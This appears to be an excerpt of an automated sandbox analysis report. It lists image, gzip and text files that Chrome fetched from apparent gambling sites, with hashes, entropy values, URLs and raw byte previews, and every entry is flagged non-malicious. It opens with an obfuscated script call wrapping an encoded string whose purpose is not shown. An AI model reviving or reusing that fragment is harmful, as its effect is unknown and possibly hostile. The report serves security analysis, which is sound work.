                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAJnwDYAafATgAYBdEgbwCIBqADiYGYGAuAMwFc0MAC4BLdJiEkQJEQEo6ANygAnAARoA3GgC8/QaPHyGfJCFVIhykcIYalaySG100UALYguDAF4ALAPoAwgByDCQeSEhQAOYgSFx0UDxCIMq8AsJiaBJS8sogQnzKaAyqzEJMDICj+oDeGYAU6swg2DSVgNJygHAqDAC+JFAANhC+UP4AJlBIvun6WRJ5BUUlZUwVDIC/AYD4moCgyoDUKoDq2oCz1oAOpru7gGTegDD/m4A3RoAsHoAZRoDvyoCADIDQcoBISoD9ft29A0P+aHw3FNMuIhHNCsVVCtVIAr5VWOwOxzOADpvv1BsMkNAYHFgQZsmC6PkIYtypVYfC9vszpcroAvL0APBaonrooZ4maE4kLUpk0pwhHU07MkhgEA8FD5dmg3JE+bFHnLcm1BpMJotUqtQCySsLRUJQCA0FKCTKufKltDlY1mtRyVbcDaGK1AC+pwpg6B4ImUHhGRpyIHB3PN5MAsHKrQAxKlb1YBOZUAsonCsYpfy6/WGvQg43+2UkhUrS2q62VCP5+1tF3fBMgfzir1QIS+xwBs285UqtUOhmAeH1ALRy8ZAMBEbn69ZlChQIhGqko2mnIAAZLPME5sNRZHYVKoRNo2xpTWhVKPx5Pp9oRPPMJuGAAqBiyEg5pU1QD0ZsdACFugBgAwAochtALvygE1XZiYFeDDHiIAD8DDcHI5KALLygDwOoc8YiNEIhCPEab4n6jakoqpS1M+uznB+gB9PoAdh6AAxKSxtpUhzlgOBpIFkaEZBhDZZoGzZPpRBalIA8wqAAS+FF2g6qj8cKICDiIfT1lh964U+gCQ5oAEqYvoAdQmAI3eYkAB51uhHIyUGcmPkpL6AOGmgBvcsKA4xJ4umgvpvKqHhgB/aoA4k6WamzF6WxTY4Y5T6AABygBUckpgA8CpZE
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 128 x 526
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):181313
                                                                                                                                                          Entropy (8bit):7.914478806976525
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:NXXzLJQgdT33HOtofaP2qVvcOjfZErjgAfk22ojHnkYcJ:5XzLJbdjXOtNjEOj4IsnkY8
                                                                                                                                                          MD5:BA7B36881A9AB4306A7C5F9DFD2CC2C1
                                                                                                                                                          SHA1:25F361D7066BD099FDD93D58212988C54D13F31E
                                                                                                                                                          SHA-256:A837C9337C54D11083F9D811A2A87C9EFE5BC363B5540E411194C0D2105F4DAB
                                                                                                                                                          SHA-512:CAD0A22D229D64354634B9DA0AE3538FEA5102B25158DBF12403D4035B1F9473156DF8CCDD0F90C037F34D355A430D41874A46381A5DD644EFE28A7E93973171
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.image110.com/uploads/zuobian.gif
                                                                                                                                                          Preview:GIF89a.........C..c.q.....$5...Y*Y.4..).k..n..Lo.....+n.1F......&E......./V.\m....t{...dL(.{{.....s.......F.....9a..,Kc.....k.'0o............#V.........sJ.../-)..H.`0.........[..t.)..0)U.NSnrr...O.|...B....p#6.....tiNKKH...Elo.uy.>.....O)0.BS...1$..........}.......03.9PmOGP.*..8...HRt........In0..H4..Jeq..yl<d......+......g.M...DVj..,......|R..O.....j.KPM.........d.N7},....)....qHu2.IR........f~.j...[`......2Q...pC..ObZ..=-?;.9e....Xb...(6...6_...}......%*..........z.f:...~;......QB..C;....b..............................................;.................................................................................................................................................................................).......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/ocs/cc.png?1717972856368
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/cc.png?r=7992680070
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):25956
                                                                                                                                                          Entropy (8bit):7.970174820456842
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:sx/d21srklvj4IRBmCa//Jt4dhIODq1S9I6W3gf:AOB3a/Rt4dhIsRI6W3gf
                                                                                                                                                          MD5:2BCE0C91243A8C6AF9F2734C62046E91
                                                                                                                                                          SHA1:C54D733AF6149D9B9C125909BE19D7E08E23EB00
                                                                                                                                                          SHA-256:C2C44236B6B88D17AAF3385171CE1A7BBAD8CF9AAC5428E4995F13EDBA258E1D
                                                                                                                                                          SHA-512:8363D759CD2B681E3532B00551DAE280C0A8F3091357E73B02F2005B37EF845FFD091FEBA14FD76AED841B4BD25CEC3ACEB1831090C0CB0FD0A4596765EEC631
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/gc_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:E61647D6616311E7A4EABB69A1A4E81E" xmpMM:InstanceID="xmp.iid:E61647D5616311E7A4EABB69A1A4E81E" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7337d2d7-b8b5-bf4f-bdae-fe34287673e4" stRef:documentID="adobe:docid:photoshop:1ae07fbb-6062-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 18388
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4084
                                                                                                                                                          Entropy (8bit):7.94569233466241
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:mwcWOzIzqP0Drv6oQckG8NF/xiWqpvCkxpR:RwIzXscRqRxiWkTpR
                                                                                                                                                          MD5:106BA6DD5A7918BDB0DD73A4594C5684
                                                                                                                                                          SHA1:5DA4B04A3D47B087CDC723C63606CCD53D61C52F
                                                                                                                                                          SHA-256:4BE1B19DD11804094ACA2A4C9E62C22AFD21B14EAFFCA0874E87A3441BE04966
                                                                                                                                                          SHA-512:1B1589144CCB52B8F53C0D6862E626808F70748B3F4E3DCB950F985A8C2200E7CE7FAD056AC6645FAD84063178DC517FAAAC7ADC2EF18BA20D19666C8CA3833E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/ocs/zbw?r=8081615777
                                                                                                                                                          Preview:...........WKo.6.>o~E.^c.....E.=t...........E.....z.R..zk` ...7.of......J..=..*E.r].=t..(..R..o.b.m.%.N.....&=|8.C/.I ....N.....P......_.o....7._P..N...=........=......$..*..jc...^..........._.>....f..s...u).}".H......t}:].YO^+.C..K?=....p.CD=._......%.{.Y'Y(.4..'..K...aV..]!6....Y!.*.e.EY.K./(.-h.t.._.\.f....C..=..K.~rV6......i..h.x~.{2U.G.....T..n..j.~.^:........s..U`N]}j1.T%....)7.u.6G..y8.....@.H..zz|...y"...DZTJ.}.'d.I......eQ.~..X*..Q.>.NO...avi......gA.V.O.\...O...."K<..%........,....w.V&...gA.k..L.K....!3....y..Y.WG...d;l0...go_.HxU.......b.|..(.f^.JE....=w<..i...q~%.<..G}.r..3..U.e)..;...DX.-.r.g.3....aKB.I..Xhy.R.b......W.......K....:p......y8.a...%`..n..E`e..JyA..R`lwK...........,....u=.l..>f. .~....._....z...7.Nwow..s..S..s....,..m....{+<h.....v/.'.%a...dd....Z.Pq..0.`~Cg.wx:.".-@0.I>..a.S.A.PLL.s.....309......)..:......s.X.D....w#h.[m.m.y....0.% .Iv.a+..D.. ..N....S../.BM..........gd..2.s.5..v..lg.c.;.....v..`...;.1_..C...2..0
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 29 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):960
                                                                                                                                                          Entropy (8bit):7.76544071744437
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:T/6RVp8x0dsfncV4L8SFvjaLZX5H473EI:T/6L0BfcqxiZX5KEI
                                                                                                                                                          MD5:34DCE9356D189B4F05F2E2675B520243
                                                                                                                                                          SHA1:25F5196E894F6FB4115C39FCAFC0E0A2411261B2
                                                                                                                                                          SHA-256:43967519C46DAC01D6BD3334848AAE22AE0DA1C1AEBD0625A5D4F87DA7666AE4
                                                                                                                                                          SHA-512:28048423406E40910019F0CD4F2AD66889E6463170B494B9F834896320A4C7D16AE6243CCEAC9934A4950C44B0BE4AB7F51A4A9D6918A90DAA0C9DEBE7BD0220
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/index/383/menu/nv7.png
                                                                                                                                                          Preview:.PNG........IHDR....................pHYs................rIDATH...{.Te.......j..OYt...e.I...VKFbd....Q..$6IiM7.M.2]X-........0/..B.m..1I3..6.n.q..h......p...y.....}.P....t\.....m..u.d..;q...f.N.t_|..l&}....Y....:..;.....@.=..f..p..q.n.......+~.&l..o..,h6....1..K...}......ew..l&=./......D.=....`\....@..~9....@V..{R.>.Wh...<..h..c7~B%jP.K1..j.[:.....P+>.J....1... .N|.U.H...g>!.....u.;...x..RT.g...@. .a;...8.O.-....N..w<X....v,........x...7.Z.........U...\Ga...DQ*...4T...k...=.q.*k...)6L.....9./....hVj..|.Q*..w.*.>..G..Qz7b..O.O>......S.\G....q.....A.z@..{DUjg....'.T>.dm....1_T....K../v.[w.....%[w.....y.k1.E.b.h/...e...w.<...F5.k../@1...C.....l.....2{..j<.?f-om..>.. 1=.$.&..d......Ab]...MS...h..)U.AbS2H.%.DIA.s...X.^.9E...m......&.......,(,.Z=..p/F.~O...Cv.;.4RTS.yg...B...7.G...e.Xt...i.Pt0.....C'..Mo>5.9...0.E.z,.....?....."h.+.aE02....wR..8....0..a ...'3^.Z.4.rE......)..........IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3277
                                                                                                                                                          Entropy (8bit):7.68223520405088
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:bccinNuitNFBNeeJ3mQWQ/IW814bOLgAuWahQEGO8YUaDV2E1D3BDhY3g4UZ35MS:4NNW8IR25WKQ5O8YUO22YvS
                                                                                                                                                          MD5:01494C55C9EB698D63A918F634F4F040
                                                                                                                                                          SHA1:FA29AF59187E300D3CB0850B6461C65C777CBD30
                                                                                                                                                          SHA-256:101E350D2DA926DCAFE843885FE34A77946D1E8A20FE1C64DA8692A22AD32B6A
                                                                                                                                                          SHA-512:CF287AB75A71A29BFC9D6E955C3BE308E66B2B31E1B84A24CD01E2F9A39A4B974F1C69E86E7205311FE0B8F4892730B81D923EABCA2A1B687E4F596DC662C3C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............L7.4....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:17BBB51BCE49E711A809823CCFAF5CCB" xmpMM:DocumentID="xmp.did:5A43B85B211611E8A37FCD2FD4B0745A" xmpMM:InstanceID="xmp.iid:5A43B85A211611E8A37FCD2FD4B0745A" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8A809D57F77611E7B91CA8896BA0A9B2" stRef:documentID="xmp.did:8A809D58F77611E7B91CA8896BA0A9B2"/> </rdf:Description> </rdf:RDF> </x:xmpme
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi1961.hydqef.com/ocs/cc.png?1717972860984
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2572
                                                                                                                                                          Entropy (8bit):7.568618565233695
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:LfvnLjICF8zDoeJ38q/yIUrXc9KqpZIqqYA7cUtH0hODmoZBbK:7tiHo0y5AvhqH7cU6Wne
                                                                                                                                                          MD5:D8FB2297DF62C98BCF7856FEB57B0942
                                                                                                                                                          SHA1:1A84A91A4EBE0F97FDF8B1732AD52327C716C496
                                                                                                                                                          SHA-256:F507FC6EBB4B2D51D9CCACB5529CF62FA37933DB1791C7084492B3342FC2C96B
                                                                                                                                                          SHA-512:E73410457471F7D997D624EF9013F7CD0D6BDA1DDD42D905AC30CB2714A2CCE1CE32CA6FE75C89267A72322CAB92C71C03185F40490C003BB09D623B0E8154A2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:ea94d59f-af8e-3b40-82cf-f343901f80d7" xmpMM:DocumentID="xmp.did:AAE4A6578A0311EA958DC410567DB7B3" xmpMM:InstanceID="xmp.iid:AAE4A6568A0311EA958DC410567DB7B3" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5bbece77-91f8-1d4c-bfc4-7cd89f8eb907" stRef:documentID="xmp.did:ea94d59f-af8e-3b40-82cf-f343901f80d7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......,IDATx.WkP.e.=......r.!.4S.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 230 x 129, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):49412
                                                                                                                                                          Entropy (8bit):7.988764073424515
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:thZdBEHwWpB52FIeSebPpz0WhTIKxNxgLcVZzn/fFyN50ZcGfOF/Kj2qAP:thZdmHtkIeS4d0UNxNqeyN5L4h2qAP
                                                                                                                                                          MD5:755C1BECB26F7616AA445D0BF258402B
                                                                                                                                                          SHA1:C1F6D80B1A475393CE38D116A1956A6DB643BCB5
                                                                                                                                                          SHA-256:0C08ABD709E8AF33990E57477A53C16FEAF932981894BA2017BAF1C81D8F590D
                                                                                                                                                          SHA-512:AF76492007AE05EEE9AB13FA39D9527825564F51F2CEA8E4CFBBD4E4449E64A9DFFE4266136D151BFB5A36868B5CC2BD520763AE0A8E5474375BE61B0A3BF8E1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/game/img_lotto.png
                                                                                                                                                          Preview:.PNG........IHDR...............Y....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmp:CreateDate="2023-07-19T12:07:20+08:00" xmp:ModifyDate="2023-07-24T11:13:56+08:00" xmp:MetadataDate="2023-07-24T11:13:56+08:00" xmpMM:InstanceID="xmp.iid:84ea7bef-ea36-4ed6-8455-fe0c55d7a41b" xmpMM:DocumentID="xmp.did:1C22611AF3A011E79FA7F752D71B3C83" xmpMM:OriginalDocumentID="xmp.did:1C22
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1183
                                                                                                                                                          Entropy (8bit):7.759551068349599
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:odWbvmeQvHbu9BC3pi8fp4+ZN8frdFz5zuUNNGTV6:bLJOHbUBC3fpKjnlNiI
                                                                                                                                                          MD5:CA3BD9886983F8466A5BDFB873F2195D
                                                                                                                                                          SHA1:F280828EB86E04980D30E119721B5495710531CD
                                                                                                                                                          SHA-256:1E4442B334D2307688561B2975F9991720328763473D8F552C0EC164B6887F78
                                                                                                                                                          SHA-512:C0C885D86876824ACC23C083A427BC31CE2164B689C8E65FF1CCAB20A3D16F24D08772F9DB24E699ACE6229E8DCF32BB795C0F8204A84C044EC6F2A3D55B7AFE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/card_bg.png
                                                                                                                                                          Preview:.PNG........IHDR...............^.....PLTE...'..6w ..!}..X.89....+.. ...d%~..U.{.i.|..s.!.."z..S..$z.8{..czL..l.!...{.c.c.)t"|..:.#...*t".."W.?...j.FR.3...,{.9w.)s...*r.3y..b$z.*...j..<|.)q$..'x..I.. l.!n6..:x$..D^.(w..S......o.2...n..h.........\.._..8..'t..e.._..Z......................"..}..{......r.u..[{.5n..c.]o.\l.cQ.%T..B..J.!G..=..;..9}.3}.2|.%o..f..d..R..J......................................>.......f..1....:..+........>..../..........h...............K..Z.....d..`..d..'...w..k..x.....w.Fv.|..f..3s.l...g.'u.r~.8i..i..j..U..T.Wt.ax.iy.Je..^.2d..c..W..W..T..S.Wi..[.8S.O^..L..M.AR.#L..P.XF.?D.PV.7B.MH.>M.^5.IL..M..=."6..?.,>..'..E.!6}b2}..y.,y.&y.(w..r((q..o.!n .n..n..m..i..h..h..g.......=tRNS.. .............................................wwWR;:54/)..........tIDAT(....BmQ.....m#.....m.m.m....U.A.u`.........7/..*?\.W.ivg.+...m.{...,..5]h...5."~....Y]....5%&.1....fW_.=q'':}...0.V......>..eA.7..=..h.7j...jU(8&B.....u._.mxj.x{Q.....}.S.bH...;....i..1..lXr..4
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):76864
                                                                                                                                                          Entropy (8bit):5.99916465004058
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:u3SEKi3DBeHsCNRRR1YH9hdpct4MxzbTRBBp/fWykwQmURaeY4zm3KfI/tMYOL:MnLcNR6dhst4MxT7/H9Oae+3K+tMlL
                                                                                                                                                          MD5:8542F00AD3C30109257F061DE49768B4
                                                                                                                                                          SHA1:F9A8E549221864B6020C68ABA44D37C680695545
                                                                                                                                                          SHA-256:86EC0FF9F7E5959EA2AAA85B57EEB213DFAD4AB7492E4369F53FBDDD3B3E3308
                                                                                                                                                          SHA-512:885B0B8F65EB6FB73D9046205ED74C474D13BAA9C03CA57FDB55584FA144AF142E86FFF74BBBAE0E9D3CF52303F1EF28DEC899C6D1CB95AC1F09904CF20CC5C9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:u9mEPUGiHlEmTCgtFvEn3jDFuwijymesGXcIRkyHvAaNbdKIrieJWerxKWOX/n0c+eM6syq5k9AO29LQc1S2BLYwGIu5XQ2w440KGJzFJ9C9UTEI58vF5mRTycaJWLkbEME5n4nN1i9JcxG+nOSfTYGuqazxoGsdgFejm+jKn/tOwjodmm1oP2xl76FYzDrE/3xvsbQ4xEA7slAaNHrgAyC8BJoG4qpRlIKBK4W961AfQgA6uAtPL0Y+O6045KPKur+uOD/6gMaDAzxVzZ6o2pLeZFU1SZ5/KhfAOFea5oNV2XtOYbVE+P57ZZDjxmwk8UQ9nffiOI8VY3sWWFNxUvX2aY+2h4xhGQ8ku2P/o96Y0Im4KTX37ti+8J3H4oj162WB1hMfXJUA8BuABo3lshuOSADgPtD/89s3XCk69+mPhNMUSYtc1e62Wqc/QkKdGw99UneI90erYCyD2Hn/ACISZlTL8BSNTsx7BcFy67KIiK+Iaq5hP195wunWPa/PH1wYUCxvnMolktfDD3oX5R0Lp8cVkQLBQN5g2pMlSYSkMEyiuV2GxkSL769kLT0WtVIrO/PHfsp3LbaDyrEa5S20tHeCP7HoB+7O5HpQkLakb4oT5Cnv8fiaXGjPRxwNunXBUC3skW0M/g1mB0ijVD2O7FqvtgboJkfLJmLi2XrUwkGEVh2mLIIc/cEFD31K3hYqSSyqwZY8c7NZJ6vOBwOJTtr4xsYc2eKgQEaAgHOjNplfY22h1jJEvXdnHcpwcvd5hE4JC5lpQb4zw7lJmRf8+qpmBDvbFJ68PThgh4zOFWJcJdc8LWvEqKXCm45JSzGqAQd6rF9DoFnC7YMAq99M7eNc9Y8vViorjw7NZqOtaRlCGZAuRqRlLVu+dZiynDuzSoEuHP09yM4ANS+S4zVrsW+udy9/eofYQfLuvhp8vhPM5F1VcQZZVrdlVM1dlLnvXCTuiSp10zCQSuAdY9ZyzPdDkFoE4hLpQ5dy
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):40838
                                                                                                                                                          Entropy (8bit):7.986245075878669
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:cFJMTmRy3jS/gow/xY2eL+/sAYa8MMe+v5+zGyxKDrNYB4C0:cLMTms3+/1wpY2eL+0bIFGya5F
                                                                                                                                                          MD5:271B08461D3D25087974C90C4DD150BD
                                                                                                                                                          SHA1:C10092994F198AE2CF260D831CD1D1FF6770DB6A
                                                                                                                                                          SHA-256:B13A412A300FA5067B4FA14BBEE1E0400D959011DE43644FEB68061805B00DD7
                                                                                                                                                          SHA-512:67E58C1458E4DA45CC441F62F4BCF607E129E9C671BF92C8A1BA27D9538E1311DCED258FD821E8EA28226BC7F0BA84EA5449203642BE494DAEA8C2E03BDDE440
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/casino/02.png
